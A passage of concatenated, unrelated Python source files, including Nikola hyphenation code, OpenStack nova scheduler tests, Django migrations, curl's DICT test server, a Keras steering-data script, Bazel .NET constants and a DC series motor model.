metadata_extractors.check_conditions(post, post.source_path, post.compiler.metadata_conditions, config, None)):
compiler_meta = post.compiler.read_metadata(post, lang=lang)
used_extractor = post.compiler
meta.update(compiler_meta)
# Meta files and inter-file metadata (priority 3, overrides compiler and filename-based metadata).
if not metafile_meta:
new_meta, used_extractor = get_metadata_from_file(post.source_path, post, config, lang, metadata_extractors_by)
meta.update(new_meta)
else:
meta.update(metafile_meta)
if lang is None:
# Only perform these checks for the default language
if 'slug' not in meta:
# If no slug is found in the metadata use the filename
meta['slug'] = slugify(os.path.splitext(
os.path.basename(post.source_path))[0], post.default_lang)
if 'title' not in meta:
# If no title is found, use the filename without extension
meta['title'] = os.path.splitext(
os.path.basename(post.source_path))[0]
# Set one-file status basing on default language only (Issue #3191)
if is_two_file or lang is None:
post.is_two_file = is_two_file
return meta, used_extractor
def hyphenate(dom, _lang):
"""Hyphenate a post."""
# circular import prevention
from .nikola import LEGAL_VALUES
lang = None
if pyphen is not None:
lang = LEGAL_VALUES['PYPHEN_LOCALES'].get(_lang, pyphen.language_fallback(_lang))
else:
utils.req_missing(['pyphen'], 'hyphenate texts', optional=True)
hyphenator = None
if pyphen is not None and lang is not None:
        # If pyphen does not exist, we tell the user when configuring the site.
        # If it does not support a language, we ignore it quietly.
try:
hyphenator = pyphen.Pyphen(lang=lang)
except KeyError:
LOGGER.error("Cannot find hyphenation dictoniaries for {0} (from {1}).".format(lang, _lang))
LOGGER.error("Pyphen cannot be installed to ~/.local (pip install --user).")
if hyphenator is not None:
for tag in ('p', 'li', 'span'):
for node in dom.xpath("//%s[not(parent::pre)]" % tag):
skip_node = False
skippable_nodes = ['kbd', 'pre', 'code', 'samp', 'mark', 'math', 'data', 'ruby', 'svg']
if node.getchildren():
for child in node.getchildren():
if child.tag in skippable_nodes or (child.tag == 'span' and 'math'
in child.get('class', [])):
skip_node = True
elif 'math' in node.get('class', []):
skip_node = True
if not skip_node:
insert_hyphens(node, hyphenator)
return dom
def insert_hyphens(node, hyphenator):
"""Insert hyphens into a node."""
textattrs = ('text', 'tail')
if isinstance(node, lxml.etree._Entity):
# HTML entities have no .text
textattrs = ('tail',)
for attr in textattrs:
text = getattr(node, attr)
if not text:
continue
new_data = ' '.join([hyphenator.inserted(w, hyphen='\u00AD')
for w in text.split(' ')])
# Spaces are trimmed, we have to add them manually back
if text[0].isspace():
new_data = ' ' + new_data
if text[-1].isspace():
new_data += ' '
setattr(node, attr, new_data)
for child in node.iterchildren():
insert_hyphens(child, hyphenator)
|
# -*- coding: utf-8 -*-
"""
Created on 2020/4/22 10:41 PM
---------
@summary:
---------
@author: Boris
@email: boris@bzkj.tech
"""
import feapder
class TestAirSpider(feapder.AirSpider):
# __custom_setting__ = dict(
# LOG_LEVEL = "INFO"
# )
def start_callback(self):
print("爬虫开始")
def end_callback(self):
print("爬虫结束")
def start_requests(self, *args, **kws):
yield feapder.Request("https://www.baidu.com")
def download_midware(self, request):
# request.headers = {'User-Agent': ""}
# request.proxies = {"https":"https://12.12.12.12:6666"}
# request.cookies = {}
return request
def validate(self, request, response):
if response.status_code != 200:
raise Exception("response code not 200") # 重试
# if "哈哈" not in response.text:
# return False # 抛弃当前请求
def parse(self, request, response):
print(response.bs4().title)
print(response.xpath("//title").extract_first())
if __name__ == "__main__":
TestAirSpider().start()
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from nova.scheduler.filters import aggregate_multitenancy_isolation as ami
from nova import test
from nova.tests.unit.scheduler import fakes
@mock.patch('nova.scheduler.filters.utils.aggregate_metadata_get_by_host')
class TestAggregateMultitenancyIsolationFilter(test.NoDBTestCase):
def setUp(self):
super(TestAggregateMultitenancyIsolationFilter, self).setUp()
self.filt_cls = ami.AggregateMultiTenancyIsolation()
def test_aggregate_multi_tenancy_isolation_with_meta_passes(self,
agg_mock):
agg_mock.return_value = {'filter_tenant_id': set(['my_tenantid'])}
filter_properties = {'context': mock.sentinel.ctx,
'request_spec': {
'instance_properties': {
'project_id': 'my_tenantid'}}}
host = fakes.FakeHostState('host1', 'compute', {})
self.assertTrue(self.filt_cls.host_passes(host, filter_properties))
def test_aggregate_multi_tenancy_isolation_with_meta_passes_comma(self,
agg_mock):
agg_mock.return_value = {'filter_tenant_id':
set(['my_tenantid', 'mytenantid2'])}
filter_properties = {'context': mock.sentinel.ctx,
'request_spec': {
'instance_properties': {
'project_id': 'my_tenantid'}}}
host = fakes.FakeHostState('host1', 'compute', {})
self.assertTrue(self.filt_cls.host_passes(host, filter_properties))
def test_aggregate_multi_tenancy_isolation_fails(self, agg_mock):
agg_mock.return_value = {'filter_tenant_id': set(['other_tenantid'])}
filter_properties = {'context': mock.sentinel.ctx,
'request_spec': {
'instance_properties': {
'project_id': 'my_tenantid'}}}
host = fakes.FakeHostState('host1', 'compute', {})
self.assertFalse(self.filt_cls.host_passes(host, filter_properties))
def test_aggregate_multi_tenancy_isolation_fails_comma(self, agg_mock):
agg_mock.return_value = {'filter_tenant_id':
set(['other_tenantid', 'other_tenantid2'])}
filter_properties = {'context': mock.sentinel.ctx,
'request_spec': {
'instance_properties': {
'project_id': 'my_tenantid'}}}
host = fakes.FakeHostState('host1', 'compute', {})
self.assertFalse(self.filt_cls.host_passes(host, filter_properties))
def test_aggregate_multi_tenancy_isolation_no_meta_passes(self, agg_mock):
agg_mock.return_value = {}
filter_properties = {'context': mock.sentinel.ctx,
'request_spec': {
'instance_properties': {
'project_id': 'my_tenantid'}}}
host = fakes.FakeHostState('host1', 'compute', {})
self.assertTrue(self.filt_cls.host_passes(host, filter_properties))
|
# Generated by Django 3.2 on 2021-07-12 19:13
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='portfolio',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=50, unique=True)),
('body', models.TextField()),
],
),
]
|
import re
from pathlib import Path
from setuptools import setup, find_packages
###############################################################################
# Package meta-data.
NAME = 'npyfile'
PROJECT_URLS = {
'Documentation': 'https://npyfile.readthedocs.io/',
'Source Code': 'https://github.com/maxstrobel/npyfile',
'Bug Tracker': 'https://github.com/maxstrobel/npyfile/issues',
}
CLASSIFIERS = [
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3 :: Only',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
'Programming Language :: Python :: Implementation :: CPython',
'Topic :: Scientific/Engineering',
'Topic :: Software Development',
'Typing :: Typed',
]
PYTHON_REQUIRES = '>=3.6'
# What packages are required for this module to be executed?
INSTALL_REQUIRES = ['numpy']
# What packages are optional?
EXTRAS_REQUIRE = {
'docs': ['sphinx', 'sphinx_autodoc_typehints', 'sphinx-rtd-theme'],
'tests': ['coverage', 'pytest', 'tox'],
}
EXTRAS_REQUIRE['dev'] = (EXTRAS_REQUIRE['docs'] + EXTRAS_REQUIRE['tests'])
# Define here entry points for the package
ENTRY_POINTS = {
'console_scripts': []
}
###############################################################################
def read(rel_path):
HERE = Path(__file__).resolve().parent
with open(HERE / rel_path, 'r', encoding='utf-8') as f:
return f.read()
# Meta data is stored on package level __init__.py -> Meta data also accessible in python
META_FILE = read(f'src/{NAME}/__init__.py')
def find_meta(meta):
"""
Extract __*meta*__ from META_FILE.
"""
meta_match = re.search(f"""^__{meta}__ = ['"]([^'"]*)['"]""", META_FILE, re.M)
if meta_match:
return meta_match.group(1)
raise RuntimeError(f'Unable to find __{meta}__ string.')
# Import the README and use it as the long-description.
# Note: this will only work if 'README.rst' is present in your MANIFEST.in file!
DESCRIPTION = find_meta('description')
try:
LONG = read('README.rst').split(".. teaser-begin")[1]
except FileNotFoundError:
LONG = DESCRIPTION
# Where the magic happens:
setup(
name=NAME,
version=find_meta('version'),
description=DESCRIPTION,
long_description=LONG,
long_description_content_type='text/x-rst',
author=find_meta('author'),
author_email=find_meta('email'),
maintainer=find_meta('author'),
maintainer_email=find_meta('email'),
python_requires=PYTHON_REQUIRES,
url=find_meta('url'),
project_urls=PROJECT_URLS,
packages=find_packages(where='src'),
package_dir={'': 'src'},
entry_points=ENTRY_POINTS,
classifiers=CLASSIFIERS,
install_requires=INSTALL_REQUIRES,
extras_require=EXTRAS_REQUIRE,
include_package_data=True,
)
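# Illustrative developer install (the command itself is an assumption, not part of this file):
#   pip install -e .[dev]
# This pulls in both the 'docs' and 'tests' extras defined in EXTRAS_REQUIRE above.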
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#***************************************************************************
# _ _ ____ _
# Project ___| | | | _ \| |
# / __| | | | |_) | |
# | (__| |_| | _ <| |___
# \___|\___/|_| \_\_____|
#
# Copyright (C) 2008 - 2020, Daniel Stenberg, <daniel@haxx.se>, et al.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at https://curl.se/docs/copyright.html.
#
# You may opt to use, copy, modify, merge, publish, distribute and/or sell
# copies of the Software, and permit persons to whom the Software is
# furnished to do so, under the terms of the COPYING file.
#
# This software is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY
# KIND, either express or implied.
#
###########################################################################
#
""" DICT server """
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import argparse
import logging
import os
import sys
from util import ClosingFileHandler
try: # Python 2
import SocketServer as socketserver
except ImportError: # Python 3
import socketserver
log = logging.getLogger(__name__)
HOST = "localhost"
# The strings that indicate the test framework is checking our aliveness
VERIFIED_REQ = b"verifiedserver"
VERIFIED_RSP = "WE ROOLZ: {pid}"
def dictserver(options):
"""
Starts up a TCP server with a DICT handler and serves DICT requests
forever.
"""
if options.pidfile:
pid = os.getpid()
# see tests/server/util.c function write_pidfile
if os.name == "nt":
pid += 65536
with open(options.pidfile, "w") as f:
f.write(str(pid))
local_bind = (options.host, options.port)
log.info("[DICT] Listening on %s", local_bind)
# Need to set the allow_reuse on the class, not on the instance.
socketserver.TCPServer.allow_reuse_address = True
server = socketserver.TCPServer(local_bind, DictHandler)
server.serve_forever()
return ScriptRC.SUCCESS
class DictHandler(socketserver.BaseRequestHandler):
"""Handler class for DICT connections.
"""
def handle(self):
"""
Simple function which responds to all queries with a 552.
"""
try:
# First, send a response to allow the server to continue.
rsp = "220 dictserver <xnooptions> <msgid@msgid>\n"
self.request.sendall(rsp.encode("utf-8"))
# Receive the request.
data = self.request.recv(1024).strip()
log.debug("[DICT] Incoming data: %r", data)
if VERIFIED_REQ in data:
log.debug("[DICT] Received verification request from test "
"framework")
pid = os.getpid()
# see tests/server/util.c function write_pidfile
if os.name == "nt":
pid += 65536
response_data = VERIFIED_RSP.format(pid=pid)
else:
log.debug("[DICT] Received normal request")
response_data = "No matches"
# Send back a failure to find.
response = "552 {0}\n".format(response_data)
log.debug("[DICT] Responding with %r", response)
self.request.sendall(response.encode("utf-8"))
except IOError:
log.exception("[DICT] IOError hit during request")
def get_options():
parser = argparse.ArgumentParser()
parser.add_argument("--port", action="store", default=9016,
type=int, help="port to listen on")
parser.add_argument("--host", action="store", default=HOST,
help="host to listen on")
parser.add_argument("--verbose", action="store", type=int, default=0,
help="verbose output")
parser.add_argument("--pidfile", action="store",
help="file name for the PID")
parser.add_argument("--logfile", action="store",
help="file name for the log")
parser.add_argument("--srcdir", action="store", help="test directory")
parser.add_argument("--id", action="store", help="server ID")
parser.add_argument("--ipv4", action="store_true", default=0,
help="IPv4 flag")
return parser.parse_args()
def setup_logging(options):
"""
Set up logging from the command line options
"""
root_logger = logging.getLogger()
add_stdout = False
formatter = logging.Formatter("%(asctime)s %(levelname)-5.5s %(message)s")
# Write out to a logfile
if options.logfile:
handler = ClosingFileHandler(options.logfile)
handler.setFormatter(formatter)
handler.setLevel(logging.DEBUG)
root_logger.addHandler(handler)
else:
# The logfile wasn't specified. Add a stdout logger.
add_stdout = True
if options.verbose:
# Add a stdout logger as well in verbose mode
root_logger.setLevel(logging.DEBUG)
add_stdout = True
else:
root_logger.setLevel(logging.INFO)
if add_stdout:
stdout_handler = logging.StreamHandler(sys.stdout)
stdout_handler.setFormatter(formatter)
stdout_handler.setLevel(logging.DEBUG)
root_logger.addHandler(stdout_handler)
class ScriptRC(object):
"""Enum for script return codes"""
SUCCESS = 0
FAILURE = 1
EXCEPTION = 2
class ScriptException(Exception):
pass
if __name__ == '__main__':
# Get the options from the user.
options = get_options()
# Setup logging using the user options
setup_logging(options)
# Run main script.
try:
rc = dictserver(options)
except Exception as e:
log.exception(e)
rc = ScriptRC.EXCEPTION
log.info("[DICT] Returning %d", rc)
sys.exit(rc)
|
import argparse
import base64
import json
from os import getcwd  # needed below when using_udacity_data is True
import cv2
import numpy as np
import matplotlib.pyplot as plt
from keras.models import model_from_json
from keras.preprocessing.image import ImageDataGenerator, array_to_img, img_to_array
# Fix error with Keras and TensorFlow
import tensorflow as tf
tf.python.control_flow_ops = tf
def displayCV2(img):
'''
Utility method to display a CV2 Image
'''
cv2.imshow('image',img)
cv2.waitKey(0)
cv2.destroyAllWindows()
def process_img_for_video(image, angle, pred_angle, frame):
'''
Used by visualize_dataset method to format image prior to adding to video
'''
font = cv2.FONT_HERSHEY_SIMPLEX
img = cv2.cvtColor(image, cv2.COLOR_YUV2BGR)
img = cv2.resize(img,None,fx=3, fy=3, interpolation = cv2.INTER_CUBIC)
h,w = img.shape[0:2]
# apply text for frame number and steering angle
cv2.putText(img, 'frame: ' + str(frame), org=(2,18), fontFace=font, fontScale=.5, color=(255,255,255), thickness=1)
cv2.putText(img, 'angle: ' + str(angle), org=(2,33), fontFace=font, fontScale=.5, color=(255,255,255), thickness=1)
# apply a line representing the steering angle
cv2.line(img,(int(w/2),int(h)),(int(w/2+angle*w/4),int(h/2)),(0,255,0),thickness=4)
if pred_angle is not None:
cv2.line(img,(int(w/2),int(h)),(int(w/2+pred_angle*w/4),int(h/2)),(0,0,255),thickness=4)
return img
def visualize_dataset(X,y,y_pred=None):
'''
format the data from the dataset (image, steering angle) and place it into a video file
'''
for i in range(len(X)):
if y_pred is not None:
img = process_img_for_video(X[i], y[i], y_pred[i], i)
else:
img = process_img_for_video(X[i], y[i], None, i)
displayCV2(img)
def preprocess_image(img):
'''
Method for preprocessing images: this method is the same used in drive.py, except this version uses
BGR to YUV and drive.py uses RGB to YUV (due to using cv2 to read the image here, where drive.py images are
received in RGB)
'''
# original shape: 160x320x3, input shape for neural net: 66x200x3
# crop to 105x320x3
#new_img = img[35:140,:,:]
# crop to 40x320x3
new_img = img[80:140,:,:]
# apply subtle blur
#new_img = cv2.GaussianBlur(new_img, (5,5), 0)
# scale to 66x200x3 (same as nVidia)
new_img = cv2.resize(new_img,(200, 66), interpolation = cv2.INTER_AREA)
# scale to ?x?x3
#new_img = cv2.resize(new_img,(80, 10), interpolation = cv2.INTER_AREA)
# convert to YUV color space (as nVidia paper suggests)
new_img = cv2.cvtColor(new_img, cv2.COLOR_BGR2YUV)
return new_img
def generate_training_data_for_visualization(image_paths, angles, batch_size=20, validation_flag=False):
'''
method for the model training data generator to load, process, and distort images
if 'validation_flag' is true the image is not distorted
'''
X = []
y = []
for i in range(batch_size):
img = cv2.imread(image_paths[i])
angle = angles[i]
img = preprocess_image(img)
if not validation_flag:
img, angle = random_distort(img, angle)
X.append(img)
y.append(angle)
return (np.array(X), np.array(y))
if __name__ == '__main__':
'''
This little guy mostly takes bits from drive.py and model.py to help clean up some data, pulling the data points
that generate the most erroneous predictions from the model and visualizing them (to make sure they're actually bad)
so I can then edit the actual steering angle values in the csv file
'''
parser = argparse.ArgumentParser(description='Remote Driving')
parser.add_argument('model', type=str,
help='Path to model definition json. Model weights should be on the same path.')
args = parser.parse_args()
with open(args.model, 'r') as jfile:
# NOTE: if you saved the file by calling json.dump(model.to_json(), ...)
# then you will have to call:
#
# model = model_from_json(json.loads(jfile.read()))\
#
# instead.
model = model_from_json(jfile.read())
model.compile("adam", "mse")
weights_file = args.model.replace('json', 'h5')
model.load_weights(weights_file)
using_udacity_data = False
img_path_prepend = ''
csv_path = './training_data/driving_log.csv'
if using_udacity_data:
img_path_prepend = getcwd() + '/udacity_data/'
csv_path = './udacity_data/driving_log.csv'
import csv
# Import driving data from csv
with open(csv_path, newline='') as f:
driving_data = list(csv.reader(f, skipinitialspace=True, delimiter=',', quoting=csv.QUOTE_NONE))
image_paths = []
angles = []
# Gather data - image paths and angles for center, left, right cameras in each row
for row in driving_data[1:]:
# skip it if ~0 speed - not representative of driving behavior
if float(row[6]) < 0.1 :
continue
# get center image path and angle
image_paths.append(img_path_prepend + row[0])
angles.append(float(row[3]))
image_paths = np.array(image_paths)
angles = np.array(angles)
print('shapes:', image_paths.shape, angles.shape)
# visualize some predictions
n = 12
X_test,y_test = generate_training_data_for_visualization(image_paths[:n], angles[:n], batch_size=n, validation_flag=True)
y_pred = model.predict(X_test, n, verbose=2)
#visualize_dataset(X_test, y_test, y_pred)
# get predictions on a larger batch - basically pull out worst predictions from each batch so they can be
# corrected manually in the csv
n = 1000
for i in reversed(range(len(image_paths)//n + 1)):
start_i = i * n
end_i = (i+1) * n
batch_size = n
if end_i > len(image_paths):
end_i = len(image_paths)
batch_size = end_i - start_i - 1
X_test,y_test = generate_training_data_for_visualization(image_paths[start_i:end_i],
angles[start_i:end_i],
batch_size=batch_size,
validation_flag=True)
y_pred = model.predict(X_test, n, verbose=2).reshape(-1,)
        # sort by the absolute diff between predicted and actual, then keep the m indices with the largest error
m = 5
bottom_m = np.argsort(abs(y_pred-y_test))[batch_size-m:]
print('indices:', bottom_m+(i*n) + 1)
print('actuals:', y_test[bottom_m])
print('predictions:', y_pred[bottom_m])
print('')
visualize_dataset(X_test[bottom_m], y_test[bottom_m], y_pred[bottom_m])
|
from tests.utils import W3CTestCase
class TestLtrSpanOnly(W3CTestCase):
vars().update(W3CTestCase.find_tests(__file__, 'ltr-span-only'))
|
import pytest
nb_not_installed = False
try:
import nbformat
    from nbconvert.preprocessors import ExecutePreprocessor, CellExecutionError
except ModuleNotFoundError:
nb_not_installed = True
from os import listdir, getcwd, pardir
from os.path import join, abspath
#Helper function to load and run notebooks with a given name at a given path
def run_notebook(filename, path):
with open(filename) as f:
ep = ExecutePreprocessor()
nb = nbformat.read(filename, nbformat.NO_CONVERT)
try:
ep.preprocess(nb, {'metadata': {'path': path}})
except CellExecutionError:
msg = f"\nError executing the notebook {join(path, filename)}\n"
print(msg)
raise
#Create a list of all notebooks to run
#ADD NEW EXAMPLE FOLDERS HERE IF NEEDED
cwd = getcwd()
paths = [join(cwd, "examples"), join(cwd, "examples", "Specialized Tutorials")]
nb_names = []
for p in paths:
nb_names += [join(p, f) for f in listdir(p) if f[-6:] == ".ipynb"]
#create an iterative test to make sure each notebook runs without any errors.
@pytest.mark.parametrize("nb", nb_names)
@pytest.mark.skipif(nb_not_installed, reason = "requires jupyter to be installed")
def test_jupyter_notebooks(nb):
path = abspath(join(nb, pardir))
run_notebook(nb, path)
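# Illustrative invocation (the file name is an assumption): run `pytest test_notebooks.py` from
# the repository root so that the relative "examples" paths above resolve correctly.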
|
"Rules constants"
BAZEL_DOTNETOS_CONSTRAINTS = {
"darwin": "@bazel_tools//platforms:osx",
"linux": "@bazel_tools//platforms:linux",
"windows": "@bazel_tools//platforms:windows",
}
BAZEL_DOTNETARCH_CONSTRAINTS = {
"amd64": "@bazel_tools//platforms:x86_64",
}
DOTNET_OS_ARCH = (
("darwin", "amd64"),
("linux", "amd64"),
("windows", "amd64"),
)
DOTNET_NETSTANDARD = {
"netstandard1.0": (".NETStandard,Version=v1.0", "NETSTANDARD1_0"),
"netstandard1.1": (".NETStandard,Version=v1.1", "NETSTANDARD1_1"),
"netstandard1.2": (".NETStandard,Version=v1.2", "NETSTANDARD1_2"),
"netstandard1.3": (".NETStandard,Version=v1.3", "NETSTANDARD1_3"),
"netstandard1.4": (".NETStandard,Version=v1.4", "NETSTANDARD1_4"),
"netstandard1.5": (".NETStandard,Version=v1.5", "NETSTANDARD1_5"),
"netstandard1.6": (".NETStandard,Version=v1.6", "NETSTANDARD1_6"),
"netstandard2.0": (".NETStandard,Version=v2.0", "NETSTANDARD2_0"),
"netstandard2.1": (".NETStandard,Version=v2.1", "NETSTANDARD2_1"),
"netstandard2.2": (".NETStandard,Version=v2.2", "NETSTANDARD2_2"),
}
# struct:
# 0. Version string - as required by TargetFrameworkAttribute and used for the download
# 1. Preprocessor directive
# 2. TFM
# 3. Runtime version
# 4. Whether NETStandard.Library is present in the SDK
DOTNET_CORE_FRAMEWORKS = {
"2.1.200": (".NETCore,Version=v2.1", "NETCOREAPP2_1", "netcoreapp2.1", "2.0.7", False),
"2.1.502": (".NETCore,Version=v2.1", "NETCOREAPP2_1", "netcoreapp2.1", "2.1.6", False),
"2.1.503": (".NETCore,Version=v2.1", "NETCOREAPP2_1", "netcoreapp2.1", "2.1.7", False),
"2.2.101": (".NETCore,Version=v2.2", "NETCOREAPP2_2", "netcoreapp2.2", "2.2.0", False),
"2.2.402": (".NETCore,Version=v2.2", "NETCOREAPP2_2", "netcoreapp2.2", "2.2.7", False),
"3.0.100": (".NETCore,Version=v3.0", "NETCOREAPP3_0", "netcoreapp3.0", "3.0.0", True),
"3.1.100": (".NETCore,Version=v3.1", "NETCOREAPP3_1", "netcoreapp3.1", "3.1.0", True),
"3.1.407": (".NETCore,Version=v3.1", "NETCOREAPP3_1", "netcoreapp3.1", "3.1.13", True),
}
DOTNET_CORE_NAMES = ["netcoreapp2.0", "netcoreapp2.1", "netcoreapp2.2", "netcoreapp3.0", "netcoreapp3.1"] + DOTNET_NETSTANDARD.keys()
DEFAULT_DOTNET_CORE_FRAMEWORK = "v3.1.100"
def _generate_constraints(names, bazel_constraints):
return {
name: bazel_constraints.get(name, "@io_bazel_rules_dotnet//dotnet/toolchain:" + name)
for name in names
}
DOTNETOS_CONSTRAINTS = _generate_constraints([p[0] for p in DOTNET_OS_ARCH], BAZEL_DOTNETOS_CONSTRAINTS)
DOTNETARCH_CONSTRAINTS = _generate_constraints([p[1] for p in DOTNET_OS_ARCH], BAZEL_DOTNETARCH_CONSTRAINTS)
DOTNETSDK_CONSTRAINTS = _generate_constraints([p for p in DOTNET_CORE_FRAMEWORKS], BAZEL_DOTNETARCH_CONSTRAINTS)
def _generate_platforms():
platforms = []
for os, arch in DOTNET_OS_ARCH:
for sdk in DOTNET_CORE_FRAMEWORKS:
constraints = [
DOTNETOS_CONSTRAINTS[os],
DOTNETARCH_CONSTRAINTS[arch],
DOTNETSDK_CONSTRAINTS[sdk],
]
platform = struct(
name = os + "_" + arch + "_" + sdk,
os = os,
arch = arch,
sdk = sdk,
constraints = constraints,
)
platforms.append(platform)
return platforms
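# PLATFORMS holds one struct per (os, arch, sdk) combination; given the name format above,
# an entry is called e.g. "linux_amd64_3.1.100".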
PLATFORMS = _generate_platforms()
|
# -*- coding: utf-8 -*-
from .inthemoment import ITM
from .config import config
__all__ = ("ITM", "config")
# Version of the ITM package
__version__ = "0.0.1"
__author__ = "Stephan Meighen-Berger"
|
# Generated by Django 3.2.8 on 2021-10-22 16:42
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('recipe', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Ingredient',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
|
import random
n = int(input('Enter the maximum number: '))
number = set()
number_user = set()
rand = random.randint(1, n)
number.add(rand)
print(number)
while True:
    ask = input('Is the target number among these numbers: ').split()
    if ask[0] == 'Help!':
number_user.update(number)
for i in range(2):
number_user.add(random.randint(1, n))
        print('Artyom could have picked the following numbers: {0}'.format(number_user))
number_user.clear()
elif int(ask[0]) == rand:
        print('You guessed it!')
break
else:
for i in ask:
number_user.add(int(i))
print(number_user)
if number_user.intersection(number):
            print('Yes!')
number_user.clear()
else:
print("Нет!")
number_user.clear()
|
from abc import ABC, abstractmethod
import logging
from typing import List, Dict, NamedTuple, Iterable
from mlagents_envs.base_env import BatchedStepResult, AgentGroupSpec, AgentGroup
from mlagents.trainers.brain import BrainParameters
from mlagents.trainers.tf_policy import TFPolicy
from mlagents.trainers.agent_processor import AgentManager, AgentManagerQueue
from mlagents.trainers.action_info import ActionInfo
AllStepResult = Dict[AgentGroup, BatchedStepResult]
AllGroupSpec = Dict[AgentGroup, AgentGroupSpec]
logger = logging.getLogger("mlagents.trainers")
class EnvironmentStep(NamedTuple):
current_all_step_result: AllStepResult
worker_id: int
brain_name_to_action_info: Dict[AgentGroup, ActionInfo]
@property
def name_behavior_ids(self) -> Iterable[AgentGroup]:
return self.current_all_step_result.keys()
@staticmethod
def empty(worker_id: int) -> "EnvironmentStep":
return EnvironmentStep({}, worker_id, {})
class EnvManager(ABC):
def __init__(self):
self.policies: Dict[AgentGroup, TFPolicy] = {}
self.agent_managers: Dict[AgentGroup, AgentManager] = {}
def set_policy(self, brain_name: AgentGroup, policy: TFPolicy) -> None:
self.policies[brain_name] = policy
if brain_name in self.agent_managers:
self.agent_managers[brain_name].policy = policy
def set_agent_manager(self, brain_name: AgentGroup, manager: AgentManager) -> None:
self.agent_managers[brain_name] = manager
@abstractmethod
def _step(self) -> List[EnvironmentStep]:
pass
@abstractmethod
def _reset_env(self, config: Dict = None) -> List[EnvironmentStep]:
pass
def reset(self, config: Dict = None) -> int:
for manager in self.agent_managers.values():
manager.end_episode()
return self._process_step_infos(self._reset_env(config))
@property
@abstractmethod
def external_brains(self) -> Dict[AgentGroup, BrainParameters]:
pass
@property
@abstractmethod
def get_properties(self) -> Dict[AgentGroup, float]:
pass
@abstractmethod
def close(self):
pass
def advance(self):
# Get new policies if found
for brain_name in self.external_brains:
try:
_policy = self.agent_managers[brain_name].policy_queue.get_nowait()
self.set_policy(brain_name, _policy)
except AgentManagerQueue.Empty:
pass
# Step the environment
new_step_infos = self._step()
# Add to AgentProcessor
num_step_infos = self._process_step_infos(new_step_infos)
return num_step_infos
def _process_step_infos(self, step_infos: List[EnvironmentStep]) -> int:
for step_info in step_infos:
for name_behavior_id in step_info.name_behavior_ids:
if name_behavior_id not in self.agent_managers:
logger.warning(
"Agent manager was not created for behavior id {}.".format(
name_behavior_id
)
)
continue
self.agent_managers[name_behavior_id].add_experiences(
step_info.current_all_step_result[name_behavior_id],
step_info.worker_id,
step_info.brain_name_to_action_info.get(
name_behavior_id, ActionInfo.empty()
),
)
return len(step_infos)
|
import numpy as np
from .dc_motor import DcMotor
class DcSeriesMotor(DcMotor):
"""The DcSeriesMotor is a DcMotor with an armature and exciting circuit connected in series to one input voltage.
===================== ========== ============= ===========================================
Motor Parameter Unit Default Value Description
===================== ========== ============= ===========================================
r_a Ohm 2.78 Armature circuit resistance
r_e Ohm 1.0 Exciting circuit resistance
l_a H 6.3e-3 Armature circuit inductance
l_e H 1.6e-3 Exciting circuit inductance
l_e_prime H 0.05 Effective excitation inductance
j_rotor kg/m^2 0.017 Moment of inertia of the rotor
===================== ========== ============= ===========================================
=============== ====== =============================================
Motor Currents Unit Description
=============== ====== =============================================
i A Circuit current
=============== ====== =============================================
=============== ====== =============================================
Motor Voltages Unit Description
=============== ====== =============================================
u V Circuit voltage
=============== ====== =============================================
======== ===========================================================
Limits / Nominal Value Dictionary Entries:
-------- -----------------------------------------------------------
Entry Description
======== ===========================================================
i Circuit Current
omega Angular Velocity
torque Motor generated torque
u Circuit Voltage
======== ===========================================================
"""
HAS_JACOBIAN = True
I_IDX = 0
CURRENTS_IDX = [0]
CURRENTS = ['i']
VOLTAGES = ['u']
# Motor parameter, nominal values and limits are based on the following DC Motor:
# https://www.heinzmann-electric-motors.com/en/products/dc-motors/pmg-132-dc-motor
_default_motor_parameter = {
'r_a': 16e-3, 'r_e': 48e-3, 'l_a': 19e-6, 'l_e_prime': 1.7e-3, 'l_e': 5.4e-3, 'j_rotor': 0.0025
}
_default_nominal_values = dict(omega=300, torque=16.0, i=97, i_a=97, i_e=97, u=60, u_a=60, u_e=60)
_default_limits = dict(omega=400, torque=38.0, i=210, i_a=210, i_e=210, u=60, u_a=60, u_e=60)
_default_initializer = {'states': {'i': 0.0},
'interval': None,
'random_init': None,
'random_params': (None, None)}
def _update_model(self):
# Docstring of superclass
mp = self._motor_parameter
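        # The single row below encodes the electrical ODE
        # di/dt = (u - (r_a + r_e) * i - l_e_prime * omega * i) / (l_a + l_e)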
self._model_constants = np.array([
[-mp['r_a'] - mp['r_e'], -mp['l_e_prime'], 1]
])
self._model_constants[self.I_IDX] = self._model_constants[self.I_IDX] / (mp['l_a'] + mp['l_e'])
def torque(self, currents):
# Docstring of superclass
return super().torque([currents[self.I_IDX], currents[self.I_IDX]])
def electrical_ode(self, state, u_in, omega, *_):
# Docstring of superclass
return np.matmul(
self._model_constants,
np.array([
state[self.I_IDX],
omega * state[self.I_IDX],
u_in[0]
])
)
def i_in(self, state):
# Docstring of superclass
return state[self.CURRENTS_IDX]
def _update_limits(self):
# Docstring of superclass
# R_a might be 0, protect against that
